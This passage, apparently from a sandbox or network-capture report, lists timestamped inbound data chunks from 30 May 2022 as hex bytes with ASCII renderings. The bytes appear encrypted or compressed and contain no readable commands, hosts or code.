11 c2 21 15 63 b5 4b f3 b5 4d f9 02 fe 22 d2 27 1f a1 9a e3 54 6f 6b 97 31 ad f4 3a 23 88 ac a9 16 0d 58 86 a1 16 0c fa 84 5f 67 71 2c 91 40 01 23 d3 28 d5 49 dc 13 7e c8 Data Ascii: VD$wIVihauK7)6j`/iXQU#PSVI?(%zJ_\m'7B7V{"iA!7N<:/T`Z/Kd(XR5G3#>jG<J!cKM"'Tok1:#X_gq,@#(I~
2022-05-30 12:45:08 UTC	90	IN	Data Raw: f4 e3 34 bf ce b7 13 80 a8 25 da 72 64 ed 2d f7 61 ba ac 83 87 d8 e3 01 0f b2 c6 cd 02 2d fe 2e cc 53 55 95 0f db 8b aa ab eb 76 f7 72 31 7d f6 16 11 27 a1 e1 9c 2b 15 3d 97 00 06 f9 a0 2e 5b f3 48 47 9d 3e 4c ee 45 09 99 94 d0 c5 65 a6 21 ed df 81 21 b3 19 3b a5 06 ee 3d c5 69 bb 72 6f 75 92 25 5a 4c 1f 3b 2e ab 5d df cf e2 88 8d ca 43 17 82 2a d3 6a 50 f7 2b f4 61 19 c8 a4 d3 9c 7b 85 3c bc 04 11 f0 b7 b7 68 2a de cb 6e ee 7e 20 d8 11 47 65 1b cc 4d 1b d8 09 e5 45 8a ca e9 c4 d0 8f 96 14 b2 b6 d0 a7 e0 02 10 d2 4c c6 0d 1c 54 63 16 b7 e8 3c 60 fe 8d 72 9f 94 4b 7c c8 2a c2 c3 6a ad 3f 25 32 df ee 9c 17 e8 62 e8 ae 44 3a 5c 08 b3 93 87 f3 b4 0c d2 bc 16 a4 91 d0 b8 22 58 5c 4c 06 f0 72 4d 54 64 bf e4 11 5e 31 4a 3b ca 7d 7c 24 93 cb 17 5e 10 36 9d 50 4c Data Ascii: 4%rd-a-.SUvr1}'+=.[HG>LEe!!;=irou%ZL;.]CjP+a{<hn~ GeMELTc<`rK\|*j?%2bD:\"X\LrMTd^1J;}\|$^6PL
2022-05-30 12:45:08 UTC	92	IN	Data Raw: 1c fa 81 e9 c4 8d 5d 96 87 c8 0d 69 be 37 d7 80 c2 e0 b9 36 d1 bd a5 66 78 85 43 7e d7 ce 03 84 33 83 e0 f6 0f bf ac bc d8 a5 d5 32 37 fb 45 2c 2b ee 88 04 5d 27 4d 4d 78 7f 5e e2 d8 87 5b 90 e7 c3 d5 3d 76 1b 08 56 a1 dd 75 57 7e 08 58 d7 82 ed 8d 42 6c e3 a6 e1 eb 07 9e 32 4b 3e 91 9b 14 24 d0 b8 42 0b b2 19 63 e9 ab 5f d0 75 37 90 da ff ab 52 01 7e e6 34 3b 6f fa 57 4a b7 3e 73 9a 7a a5 26 44 54 d9 46 79 81 46 40 e9 9f 77 e9 48 47 7c a1 99 4c b4 9e cf 1c f2 ae 5b 82 10 1c 86 8d 78 8d 6d 10 06 00 8d 47 cd fc 9e 1d 5a 3e 24 66 79 a7 91 15 fd 16 54 0f 0a 78 75 e9 44 3d 5f 90 c1 38 be d5 c7 8e b3 60 93 13 57 a2 3a e5 90 25 ad ae b8 58 44 26 bc 7e 04 c4 4a 6a e1 88 9c 08 71 c8 7d a2 85 3f 03 4f 39 91 fc 24 22 77 64 0a cd ed 25 3b b6 a7 1b 4e c5 ea 2e b3 ec Data Ascii: ]i76fxC~327E,+]'MMx^[=vVuW~XBl2K>$Bc_u7R~4;oWJ>sz&DTFyF@wHG\|L[xmGZ>$fyTxuD=_8`W:%XD&~Jjq}?O9$"wd%;N.
2022-05-30 12:45:08 UTC	93	IN	Data Raw: 7e 21 64 76 4c 0f f4 14 cd 8e 76 37 68 5f 5d 9b 46 47 74 6a 52 e2 a7 f3 c9 68 12 d7 ed 28 db bd 95 34 9b 78 34 35 7b 73 46 26 a2 7a c6 17 70 44 96 88 31 c5 88 ac 7b 05 70 71 dd c5 3d c0 60 cc e2 f0 89 2d be c3 06 83 3a d9 5d 4f 32 16 06 3d 35 e2 eb eb 62 d5 67 0f 1e a2 e2 c2 00 06 a0 c7 2e 55 9c c7 7d eb 8d c5 f9 18 f1 3d 17 7b b3 3a 75 93 8f 47 8a c1 ce 85 bd 0a af fe c2 88 cd 2c 0e 51 a2 15 4f ee dd 67 d6 79 56 a3 40 26 ff 8c 06 75 3b 94 51 9b 6a a0 91 94 aa be 6c 9c 06 d7 79 53 41 f2 73 6e 91 47 a2 7f 49 23 af f4 22 08 16 5d ab 0a ad e9 3d 41 4f d2 fe 74 38 f0 6b 3c 45 08 22 0f ab 9c 35 81 60 c0 ea 7f b4 ce d9 77 c0 a7 b2 ee 1d a6 1a ae 1f 47 e9 b1 65 20 66 7b 99 fc e2 92 13 c5 92 84 1c ec c2 90 b0 f6 4f 28 cc db 83 61 43 da d9 86 df 16 d4 6d 14 42 ef Data Ascii: ~!dvLv7h_]FGtjRh(4x45{sF&zpD1{pq=`-:]O2=5bg.U}={:uG,QOgyV@&u;QjlySAsnGI#"]=AOt8k<E"5`wGe f{O(aCmB
2022-05-30 12:45:08 UTC	94	IN	Data Raw: a3 64 cd ca 41 f1 99 3c eb b1 41 5a 49 77 dd 83 87 c7 42 ca cd 12 29 b9 e3 8a 10 65 79 eb dc 01 7b f7 bc 90 c8 14 95 93 66 c6 44 92 ff 72 b8 e7 c4 35 8c 47 5a a7 2e d2 7c c4 2f 65 8b cc fc 9d 1d d4 1e 55 6b 90 a0 c2 f4 2d 3d b8 ad 8a c7 a6 ae 37 48 33 32 1c 21 e8 36 69 9a af db 5d 3a fb ed 34 48 a4 90 a6 4f d4 d7 c6 0d df f6 ec 0a dd 93 c3 53 dd 4b c2 66 95 8f 5a 85 7f 76 c7 6f 6b c5 35 9b 41 97 df 6b 5c a9 77 ad 0e 11 8c 76 77 85 98 33 92 5a b4 8a d2 bc 16 a8 91 89 a8 22 58 53 9f c8 17 41 de 8c 63 77 83 fd 42 62 f4 7c 5b a3 b0 af 4d d4 cc 57 e4 e9 66 ae d9 76 36 7e e2 c3 d8 bb cf a9 de 77 54 88 6c b0 c6 18 2a 36 06 8b be 67 65 fa 2b 27 41 01 9d 0b a7 f9 d7 14 17 36 cd ba f3 21 9a 09 31 a7 7b 32 80 f4 c8 9b 8f 12 ab 05 c2 5d 9a 43 f3 3e 32 46 1c b5 03 7a Data Ascii: dA<AZIwB)ey{fDr5GZ.\|/eUk-=7H32!6i]:4HOSKfZvok5Ak\wvw3Z"XSAcwBb\|[MWfv6~wTl*6ge+'A6!1{2]C>2Fz
2022-05-30 12:45:08 UTC	95	IN	Data Raw: 3d 09 aa f5 b7 72 16 39 f8 a9 08 17 c5 82 ed 6c 75 ee 11 92 53 30 ac e5 68 dc f1 7a 4b e1 74 f5 8b 37 24 bc b8 d3 8a 74 2d 80 a7 fa 58 da ec be 52 01 ad 80 3a 3b 66 1e df 1b 5d 6e 9b d2 86 e5 a1 10 5e fd f1 5f ee 63 f9 17 e3 3e 94 0b 41 0a 17 e3 31 39 d3 67 77 13 2a d1 0b c0 79 4c 11 3b b7 7d ec 22 d9 1b 95 8e cd 8b 13 39 6f d4 1c 20 4f e3 ac c5 ec 43 8c cc 90 1e b9 20 c2 d7 cd e8 fb 20 83 4f c8 b2 88 a3 8b 24 e4 9b fc 8a 10 eb 2b f3 12 c8 27 84 7f 0b d1 44 f6 3c 22 52 35 2e f2 52 a2 6f 07 8f 76 5b 3b 8c 44 cd 89 12 f4 ed 81 5f 92 72 32 66 f6 ec 75 4c a3 84 0e fa 01 1e b2 2f 36 aa 50 ef a5 10 5d 75 7f 32 25 1e 54 cd ef ba ce 67 3e 3f e3 a8 f0 f7 a1 e1 9c 5b 15 be 20 fe f9 22 00 b6 54 1f b6 02 66 0b 12 65 04 d5 55 f1 1b 3b 9a 24 44 78 6c 5a 50 d0 08 1e 17 Data Ascii: =r9luS0hzKt7$t-XR:;f]n^_c>A19gw*yL;}"9o OC O$+'D<"R5.Rov[;D_r2fuL/6P]u2%Tg>?[ "TfeU;$DxlZP
2022-05-30 12:45:08 UTC	97	IN	Data Raw: b1 22 84 af 95 17 87 d6 9f 3c b6 3a f0 91 84 72 9e 69 36 bc 0d d5 ee 96 b4 bf 88 e3 3e d1 0c 9c df 18 6e 0c 4b ee 18 dd 55 16 dd c7 69 3a 49 ea 2e 6a 2f d9 38 72 89 b9 81 70 53 1a 93 3d 6d 5b ea c2 21 15 3f b5 67 a3 b5 4d 1e 4d 57 36 1e f2 31 af 8d 9f ec 99 7c 3c 96 de 47 93 72 23 bc f8 57 06 59 f2 2e 4b 42 e3 2b af 6d 45 e0 44 b5 ff 51 d6 f6 28 b9 b6 84 96 f3 fd e8 e6 20 0b 1c 2d 3e 20 b0 db 2b 77 c7 67 fa d7 df 3e 05 dc 0e d3 8d 01 30 8d 82 a6 2d 46 8b 26 bd 1c 7c 14 b1 81 aa b3 29 49 0b a4 56 01 38 c2 e2 2c 10 ce e9 95 3b 0d 69 ce 37 21 ce c3 e0 61 7b 4e 66 28 af 75 96 c8 6d 43 46 1b c3 33 ba ab 1f 87 05 6b 8c 3f 38 98 f2 df 5a 3c 96 7c 35 c0 c4 ee 60 b2 b0 ab 08 e6 1d d8 8f 63 bf cb 82 2b c3 1c 02 e7 7f f7 33 88 23 4e b0 10 7a 70 52 43 8a 09 90 b7 e2 Data Ascii: "<:ri6>nKUi:I.j/8rpS=m[!?gMMW61\|<Gr#WY.KB+mEDQ( -> +wg>0-F&\|)IV8,;i7!a{Nf(umCF3k?8Z<\|5`c+3#NzpRC
2022-05-30 12:45:08 UTC	97	IN	Data Raw: 73 97 11 fe 93 2c a6 8a 0d 11 0c a0 f8 88 99 3e b8 48 f5 97 a7 28 27 20 56 47 72 89 e9 d9 9f 27 8e 01 9e f5 78 6e 38 a4 1b 4f e2 af 48 e7 f2 3f 4a 0c b2 7b 38 cc 1c 86 a6 2e 57 ee 1c 40 a7 29 33 07 c3 6e 22 73 1e ea bc 86 e8 af 7c ce da d4 3a 66 24 7f b8 91 df 1d 46 85 69 7b b9 17 c2 d4 f5 fd 21 da 30 7f de 71 0a 70 5c e1 63 40 a7 7b 47 b0 45 f9 d4 ae 33 1d fa b8 e7 31 46 3b 8a 1c 49 7b a8 aa f8 35 14 81 b6 20 36 e5 c3 d4 16 38 bb f8 7f fd fd c7 b7 d1 fe f7 7c 9d eb fd 25 38 b2 a5 cf f5 ee 2d 16 fb 01 6c b6 dc c5 fa 8c 03 eb 71 64 58 6e 68 33 57 e9 6e 76 ec 16 2c 71 6d d8 43 9e 0a 72 f8 b2 07 f4 18 ed 24 b8 dc 57 98 2f e0 a4 af e9 8f 5d 76 9e e1 15 36 d7 b2 93 af ed 40 87 d5 01 ff cc 2d b0 56 e1 c1 94 ae 27 10 2b 66 3b 0c 20 60 b7 8a 6a de 44 d2 84 ec 30 Data Ascii: s,>H(' VGr'xn8OH?J{8.W@)3n"s\|:f$Fi{!0qp\c@{GE31F;I{5 68\|%8-lqdXnh3Wnv,qmCr$W/]v6@-V'+f; `jD0
2022-05-30 12:45:08 UTC	99	IN	Data Raw: b8 7a a4 16 fb 55 bb d4 ed 9b a4 ed 00 d2 d9 09 8d e8 5a a6 e2 76 80 1a 7e 64 f9 0a eb 2a 41 17 bb 2b 22 79 48 49 3b be 86 0a f7 e0 d7 18 38 44 f3 5f 85 fe 9e 20 7b 0b 07 16 94 91 a6 d2 e3 23 61 fb 1c f0 f4 aa 42 2c 6f 12 f6 3c d1 cd 8a 83 d8 2b 4d b0 3e 65 27 cc 18 6a 93 19 71 ec d2 e1 2e ff 2d 52 ab 74 74 33 c8 fe f2 c4 76 78 9d 16 24 ac a3 d6 a2 a0 7d 7f b0 91 f2 9b 22 58 81 8c 62 3c 84 80 27 17 10 c7 4e 00 6a 29 ce 6c 40 d6 ff f2 04 df 76 ab ff 74 25 4a db f6 db 02 78 b5 ad 81 8c ef 60 04 8a 6c 5a 7f 15 67 05 7b 9b 2e 3a ee 0c f8 18 5b 9d 5c 4e a7 12 9f 14 17 f2 cd 5d bf 7e 8d 48 15 18 c1 b9 dd b9 d3 18 39 f1 14 34 80 79 c9 d0 5a 65 20 69 9a d0 2d 86 f5 4d 5c bb da ad b2 d6 90 3d aa e2 7e 4b 90 da 61 6d 80 7e 9d b5 72 e5 5f 13 fa ca 60 e5 9e 3b 73 7b Data Ascii: zUZv~d*A+"yHI;8D_ {#aB,o<+M>e'jq.-Rtt3vx$}"Xb<'Nj)l@vt%Jx`lZg{.:[\N]~H94yZe i-M\=~Kam~r_`;s{
2022-05-30 12:45:08 UTC	100	IN	Data Raw: 8c b4 a4 34 14 04 07 95 75 37 9e 6d 92 d1 f9 75 c2 ef c6 4e a1 d6 83 c3 c7 69 fa 8f 0e 0b a1 88 96 9a 88 b7 e2 97 ae e8 75 36 e7 cd af e0 e8 54 68 bc 25 68 70 2f 17 a5 7d 10 d1 c5 29 5e 00 c5 07 cd e7 67 84 d9 34 d2 b4 e3 86 32 0e 78 b0 b3 fb fc fc ad 01 cf 90 92 14 9e d6 87 40 62 da 8f a5 dd 53 4d 9e a6 73 a9 a8 1e 6c c9 12 cf b6 63 f5 c5 3d 7a 80 80 71 36 af b0 50 9a 71 e1 96 68 4a b1 9c fc c5 80 18 e9 1b 40 53 12 49 da 59 16 a3 70 33 f3 74 8d 35 e3 7f 6c 4a 8f 48 8b 99 c8 77 fc 51 93 c3 db 5b f8 9f 84 17 b1 43 e4 48 ac 18 17 8d e4 5c 01 27 0d d3 52 3b 8f cd ed c4 24 22 22 33 b6 2f 2f b6 02 60 27 7e c3 43 76 ee 42 5d 89 41 62 ae 35 b6 80 87 68 44 fa cd 1a 4a f4 3c 58 ba 0e ce 07 ab 35 65 29 0f a1 f4 5b 67 64 03 bb fa 20 8b 86 18 7d b3 7a 3e 9c f3 03 f8 Data Ascii: 4u7muNiu6Th%hp/})^g42x@bSMslc=zq6PqhJ@SIYp3t5lJHwQ[CH\'R;$""3//`'~CvB]Ab5hDJ<X5e)[gd }z>
2022-05-30 12:45:08 UTC	101	IN	Data Raw: 71 41 5c 91 b7 ca 40 2c 02 52 eb 7d b1 7f e9 82 57 91 cc 91 77 ad 46 56 76 b1 97 fe 43 69 7d df 1b 77 7f b6 7e 6c 4a 31 7f 19 f8 a2 9e b3 84 17 72 f9 1c fb 95 7e df 38 03 be 2f 45 54 ca 3e ab 4e 13 5f e8 7e 08 c8 35 aa a9 ac 1e c3 b9 dc d8 c0 3d df c9 2d 01 74 38 c8 8c 71 e2 f0 be 44 13 f6 8b 20 a6 39 15 17 b7 54 87 fa 07 55 76 18 69 e3 b5 ff 9d 67 d3 e0 65 a2 5a 16 8d 03 7c fe dd cc b6 ab aa 67 c2 3b c4 43 47 14 73 46 3d 3b f5 2c ad 2e 3f b0 b0 52 0e 55 02 79 33 0d 3b 96 a7 0c 8f 66 af 90 c0 45 02 19 0a 11 dd 5b 3d d7 c8 78 0c 81 7f 3b cd be 31 94 dd ec 00 69 eb a5 32 e3 aa 47 d6 9c 66 50 b8 3c e3 89 71 ac 29 10 90 81 72 b5 64 83 ff f6 fe 0b 68 91 1d 1f 14 df 38 0f da 4c d4 a9 3c d0 0a 57 21 6f ad aa 34 0e 06 86 53 b5 6c db ca cb 1d 2b eb 2f 6c 22 49 06 Data Ascii: qA\@,R}WwFVvCi}w~lJ1r~8/ET>N_~5=-t8qD 9TUvigeZ\|g;CGsF=;,.?RUy3;fE[=x;1i2GfP<q)rdh8L<W!o4Sl+/l"I
2022-05-30 12:45:08 UTC	102	IN	Data Raw: df f9 7c d7 8d fb 97 b3 ba 69 2c 87 c2 d9 5f ed 6b f8 43 27 9f 13 6a 93 c4 d4 75 3b 20 b3 02 94 cf 65 d0 db f0 c8 fe e9 50 88 87 9b 1f e8 4c 53 89 58 5f 18 ed 28 87 ab 56 57 6f e4 99 d4 2a e5 4d 31 c9 9a 00 11 d5 7d 86 23 61 6b 10 ed e0 78 b8 06 dc ad e1 aa b3 a9 cf 17 ee 22 29 bb 8d 9f de 77 c6 da 93 f6 a4 d3 9e de 51 fc c5 67 9b 2b fe e3 54 6d e8 19 4f d4 46 67 ad 59 65 2f c5 89 56 f4 cd e6 3e 32 8e fa 76 83 2f f4 14 cb 32 38 17 d9 87 ee 4e ba 53 cf b7 22 f4 81 e4 43 02 bb a5 92 cc 4a 56 e6 34 12 7e e0 a3 c8 bc a5 53 ac 11 91 0e fb 88 45 98 e4 60 5b d8 5d 03 4b e1 23 b9 72 08 05 fe 53 1a f2 c6 08 79 a8 6a 9a c2 d6 81 59 d2 8e 4e 86 86 4c ae c6 87 64 dc 58 a2 e2 1b 99 06 90 c0 2e 55 49 d5 f4 a7 41 8c 84 b6 ca 0f 63 f3 d0 a3 71 a3 98 e9 46 d7 63 49 29 88 Data Ascii: \|i,_kC'ju; ePLSX_(VWo*M1}#akx")wQg+TmOFgYe/V>2v/28NS"CJV4~SE`[]K#rSyjYNLdX.UIAcqFcI)
2022-05-30 12:45:08 UTC	104	IN	Data Raw: 99 7b 8f e0 c7 1b 07 e3 97 bd 8e a7 4a 1e fc 16 87 c9 8a 53 92 1c 9e c6 3e 38 8c 00 44 1b 5e 37 c7 45 3d 00 d6 6f c3 b4 98 b8 15 51 b8 49 68 b6 0f b1 5b 69 42 e3 94 60 47 b8 91 ae 24 29 ca ef 63 d5 81 d0 e7 93 68 fc 2a 20 7b aa a8 19 73 b9 28 e7 ea cb e3 4a ec 9b 14 f0 74 fa 93 e9 12 25 de 7f 2b 31 bd 97 0f 8b 6c ff 02 bb d9 28 72 f3 2f f6 16 19 33 20 26 7f 14 a3 a3 77 74 22 ad a2 46 a1 b5 37 03 1a 6c da b7 91 00 6f 60 c1 4e 29 6a 4e 1d 82 ee 86 c7 99 3d 23 ca 2e 35 39 59 87 85 36 07 aa 25 26 ce 5b 6d 09 2a 2e 6c 60 52 39 87 f1 6f 9c 1e ed bb 56 b0 3f 90 9a 60 6b d4 0b 51 9c 5b b1 3c bc 4b 4d d4 fa b7 4c 93 a2 65 9f 06 a2 c5 28 6a 24 ef d7 44 62 fc 30 45 36 02 8a 22 68 0c d2 21 e2 a9 52 80 a0 b1 63 82 28 d3 ba 5b a3 b2 0a c0 4b ff ad 80 39 39 9b 6b cf 1f Data Ascii: {JS>8D^7E=oQIh[iB`G$)ch* {s(Jt%+1l(r/3 &wt"F7lo`N)jN=#.59Y6%&[m*.l`R9oV?`kQ[<KMLe(j$Db0E6"h!Rc([K99k
2022-05-30 12:45:08 UTC	105	IN	Data Raw: d6 c2 f3 a0 bc 99 a1 3b 53 f1 bc 99 53 25 1c 17 b6 a7 f6 a6 03 9d 1a 8f 14 e4 f7 30 ea 09 ad 2f 32 38 ff 9b 74 67 c1 11 fe 7c ab c9 39 5a 4a 83 4c 23 fa a6 32 4d 9a 08 89 96 69 bd ab 25 66 b2 f4 c3 14 36 0c ea c4 13 15 7f 62 3b b5 88 f6 99 b5 95 28 47 a9 f8 10 12 f8 5e 66 85 43 7e d7 ee 04 84 33 51 cb 11 bf e9 ac bc f3 40 28 3c 99 0a db d1 2b ab 19 d7 c1 61 27 a5 fc d3 dc 5f 10 ca 64 6d 66 39 6e c2 74 1e c0 b4 72 a8 bc 7f 1d 2e a9 6f 2d 43 56 75 91 cd 5c 5a 14 bf ae d3 b4 e8 9c 63 b1 c9 a3 2b ed 53 be b8 03 01 b8 45 83 ff 65 a7 27 a0 53 e9 fe d1 79 c2 6d 64 3a 3b 4b 32 92 a3 85 2a 40 2b 94 78 d9 9d 48 7c 37 ba 52 60 90 a5 60 74 9e 19 67 e3 51 f7 10 b2 fd 7f 8d 0a 05 97 a0 53 3a 36 93 87 9e ff 98 7b 02 fc 2e fa d7 3e 33 d4 1e 4e e3 21 46 59 b1 72 fd d6 1f Data Ascii: ;SS%0/28tg\|9ZJL#2Mi%f6b;(G^fC~3Q@(<+a'_dmf9ntr.o-CVu\Zc+SEe'Symd:;K2*@+xH\|7R``tgQS:6{.>3N!FYr
2022-05-30 12:45:08 UTC	106	IN	Data Raw: 5d 00 1b b5 36 29 6f 15 87 45 74 16 0f 39 81 07 dd 07 be 38 94 30 67 ce 40 d7 22 06 8c e8 77 70 fa 87 5a 86 7c 7b de b0 70 3a 98 93 37 6d 1b 05 4f 22 3a 83 0a 44 28 22 d1 9d d0 79 b4 ee 48 31 f7 b5 fa 53 cb ea 34 a6 f5 9f 64 de ba 59 8d 0d e8 e6 7d da bd 8e 07 0f 8b 0a 43 92 fd ec 5f f3 3c 0b 36 f0 cd f3 4e 78 65 0a f4 60 0e 06 d5 f0 a5 4b c9 d7 6b 01 75 53 93 ba fd b0 8c 87 11 df 2c 69 cd 67 ed ec 9a f5 e7 ed c8 dc 5d 4f 32 1b 1f e1 f2 88 c3 e3 7a 7f 67 35 b9 5c 4d 6f d4 2a 38 36 a8 45 14 17 f0 97 dc 90 9a ce 65 c2 e8 22 bd 2a 8a 49 e4 5a 4e 4b 3e 57 51 23 47 0c 3c f2 f2 0f e3 4b 9d 15 3a 6a 89 bc a3 4a f9 15 71 a0 c1 33 30 35 68 c2 da 83 99 7b 14 62 88 34 98 eb e1 c0 fc bf 6b a5 75 d8 7d 40 d9 69 fe c6 42 ec 2c 04 32 b0 95 4a 0b fd c0 47 17 ce 87 f3 7f Data Ascii: ]6)oEt980g@"wpZ\|{p:7mO":D("yH1S4dY}C_<6Nxe`KkuS,ig]O2zg5\Mo86Ee"IZNK>WQ#G<K:jJq305h{b4ku}@iB,2JG
2022-05-30 12:45:08 UTC	108	IN	Data Raw: 2f 10 52 8c 4f ed 7f 25 d6 4e 4e 8c cd 87 38 89 c3 26 b2 04 bf bc 62 0e b1 b2 c8 68 2d 48 c4 de 81 d7 97 5f 33 0a 25 27 a7 d9 71 1e c1 c0 08 b0 c3 7c 62 c1 3b 8a bd 88 ca 59 07 a9 91 01 17 76 1e 76 14 6c 44 82 4d 4c c9 1d 38 11 2b 4f 46 76 46 12 78 66 0a e5 bc 74 f5 bd 5b a5 45 8d bd 01 55 db 48 a4 14 6d 7a da d1 93 60 c1 38 53 e3 41 e9 0f 66 7e f5 3c d7 eb 0a 1d 50 88 0d 1c bc 47 3b c2 c0 44 ba 5d 28 ec a0 c2 f4 63 e9 0a fa e0 d7 1c f2 88 1b cc 27 89 4b c7 33 5a 03 ad 4b 79 2e 70 94 53 a2 0b 6e 59 92 0d 28 d1 39 9f 3a c5 0a a6 b6 3c 26 d4 94 ba e7 8e cf 1f b6 54 0a 1d bb 25 39 20 b3 88 55 c1 ed 9c ff 74 1f 0d 52 c9 76 f0 97 4d cf 44 0d c3 db e7 f0 32 b8 f1 d3 c2 dc a7 0c 79 42 94 1a 1d bf e1 1c 14 12 5e 31 2b 64 45 8c 34 fb 0a 84 33 42 71 fe 53 2f 52 a9 Data Ascii: /RO%NN8&bh-H_3%'q\|b;YvvlDML8+OFvFxft[EUHmz`8SAf~<PG;D](c'K3ZKy.pSnY(9:<&T%9 UtRvMD2yB^1+dE43BqS/R
2022-05-30 12:45:08 UTC	109	IN	Data Raw: 91 b0 24 0a 10 58 ee 94 3b 0b aa 26 de b5 6a b8 d6 9e b8 f8 1e 84 f3 b6 4e cd b5 c0 aa 47 7b ef ba fd 92 2a 26 5d 36 3c 90 98 72 df 0a d7 ea 52 ae 32 94 84 13 5b cf 33 4b ee 11 0f 22 5d 89 71 85 41 f2 91 4c 8b a8 9a 20 84 23 4e 6b 61 2b 7d 12 06 0f 4d 61 14 94 82 c4 6f 58 51 5d f8 82 4e 63 a5 c9 8d da 3f 54 4e c8 cc 40 38 ee f5 59 32 47 9c 90 ff 2e 6c a7 7f 56 3f 57 1c d8 3f 73 43 94 30 5f 9d 12 d9 b9 a9 e2 e1 cd 16 60 fa 21 41 db 6e f0 13 fa 38 d3 ec 7a d1 16 a5 7d c6 5e 3c 60 92 51 da ee 56 ac ab a0 04 77 16 0e 47 6d db 99 6e ea d9 ac 03 d1 47 a2 8a 90 1f 24 b0 f1 05 46 e0 bc 53 ea 0a c8 b3 59 b3 77 24 e4 3a 28 43 dd 25 46 6d 1e 4c a6 09 f9 8b 82 bb e3 1f ae 47 5f e0 d0 d0 df f8 f8 fd b7 f9 ab 67 57 64 ff 73 02 26 69 fe 1e e6 e8 56 7c af d1 0e 4e fb c9 Data Ascii: $X;&jNG{*&]6<rR2[3K"]qAL #Nka+}MaoXQ]Nc?TN@8Y2G.lV?W?sC0_`!An8z}^<`QVwGmnG$FSYw$:(C%FmLG_gWds&iV\|N
2022-05-30 12:45:08 UTC	110	IN	Data Raw: 93 a0 9e 10 ba 81 23 c3 06 42 8a 49 75 f7 e6 40 31 4c 1b f1 f2 4e 78 1b 14 bc a7 d5 47 7b ec 91 cc 64 fb 46 03 1e 2f e0 d7 18 3b c1 37 70 0e 36 60 e5 13 4d 9b ec d5 77 ff 29 46 f9 d8 c6 41 4f 62 fd ed ca fa 69 d5 18 de 5d 4f c6 61 9e 0e 85 c6 c7 60 96 e6 89 29 58 a2 b2 e4 50 65 d2 28 94 ab e8 e8 c3 67 f6 eb d2 2e b6 4d fa 21 38 ea fc b4 0b 9d b1 c0 89 a1 29 88 b9 e7 d5 26 61 2e b0 43 54 9e 8d 3a b8 3b 79 a5 b5 4f 38 2d 13 70 6e f6 bb 73 50 b2 f5 a2 11 5b f8 31 fb 82 c1 4d f9 df cf 02 f8 a6 79 c4 a0 6a b5 6d 40 24 41 e8 02 b4 ff 57 ab 93 2a 33 4c b8 7d af 17 90 62 ab 15 1b a9 79 18 8e 8b 6a cf 4c 6c 8f 37 22 c1 7f 4c f7 8e 35 16 aa a6 7c 59 47 ee 0b b7 b6 5b 7c 1a 38 65 c2 20 75 b6 f4 f4 3c 75 78 40 19 42 05 47 15 6b 4f 0e c8 26 df b5 41 f5 6b ef 55 e2 ae Data Ascii: #BIu@1LNxG{dF/;7p6`Mw)FAObi]Oa`)XPe(g.M!8)&a.CT:;yO8-pnsP[1Myjm@$AW*3L}byjLl7"L5\|YG[\|8e u<ux@BGkO&AkU
2022-05-30 12:45:08 UTC	111	IN	Data Raw: 6c 49 e6 4d 45 c9 20 5b 8d 1d cb 8f 81 0d f5 38 44 73 49 e9 22 a2 ee 05 a9 0a 4f bf bc fa 19 a7 64 3d 9d 80 05 5d d7 cf d6 30 36 69 c7 e9 0f ed b3 56 9c 54 2f 06 58 d0 80 cc 9b ff 04 27 41 27 ad 79 d4 26 78 84 fa 79 aa 4a a2 73 94 f3 a1 fc 20 3f e0 a2 ff 15 a4 bd 44 f6 ab d3 5d 1e 9b 19 55 36 2f 5e d2 1c 0b 6c f7 7d 14 f0 f8 08 61 32 7c a3 39 69 16 f8 c8 8f 9a 45 e0 48 19 70 18 26 a9 df 25 e2 54 82 b8 eb ad cd e9 81 90 2f fd d0 2f c8 77 fb a0 52 98 b4 16 a8 78 54 06 dc 4c 08 4a 2e f0 0e 98 26 9c 81 8b 96 de 31 a2 2b b4 43 f7 64 93 cb 17 5e a9 fc dc 7e ea 0f 3e f3 9e 6e 1b a5 f5 43 04 98 81 1e e7 aa 77 ae d7 81 73 8c c4 97 54 03 1b 5b 1f 3f df 11 2c d4 97 c4 09 53 59 ec f3 76 65 df 26 27 7e d9 de 62 15 e2 31 04 6e 89 b6 5a e7 62 32 e9 65 3a ec 38 c5 3c 0f Data Ascii: lIME [8DsI"Od=]06iVT/X'A'y&xyJs ?D]U6/^l}a2\|9iEHp&%T//wRxTLJ.&1+Cd^~>nCwsT[?,SYve&'~b1nZb2e:8<
2022-05-30 12:45:08 UTC	113	IN	Data Raw: 97 56 93 b2 9b 2b 8b 23 4e 5e 7f 91 83 ed ef 9e 81 15 1f 9c 70 a8 22 58 d8 d9 7a 3b 34 71 5b 00 71 db 1f 54 cb 67 3d c2 c4 76 bc 58 47 ee aa ac ff 2e 6c 44 33 a5 2a bc 90 91 4a 58 cc 9d 9c 7e 9f 12 d9 9d 5f 86 8d 06 e8 e3 3e a0 0d 6f 1f 0f 91 34 29 d0 67 f4 cd 62 ab c3 e4 69 b7 9a f1 fb 18 39 be 54 61 84 70 32 da b4 ff d5 ab 9a 86 4f 85 8d 47 cd 8f c9 41 78 2d 6a bb c2 5e 89 0a c6 3e 8d 06 4c 1d 9c d2 74 77 8e 3a 0c ac 75 91 af 33 2e 9e 25 40 73 49 09 2c c3 97 60 17 be 81 ae 70 27 c5 08 8c 5e 7e 2f 64 be 33 76 ed 7f ae 2d da 06 c4 44 48 d3 2d b4 2c 97 24 66 77 4a af 41 97 c2 b5 29 00 2c c3 d6 7c 7f 08 2c 31 88 e4 2a 06 c3 a2 91 91 83 26 72 b2 d7 52 47 c8 39 70 0d c0 73 a2 45 0a 6d 85 c3 32 0d eb f6 11 37 08 f1 30 e0 4e b2 1f cd fa 70 f5 31 68 21 c7 10 dd Data Ascii: V+#N^p"Xz;4q[qTg=vXG.lD3JX~_>o4)gbi9Tap2OGAx-j^>Ltw:u3.%@sI,`p'^~/d3v-DH-,$fwJA),\|,1&rRG9psEm270Np1h!
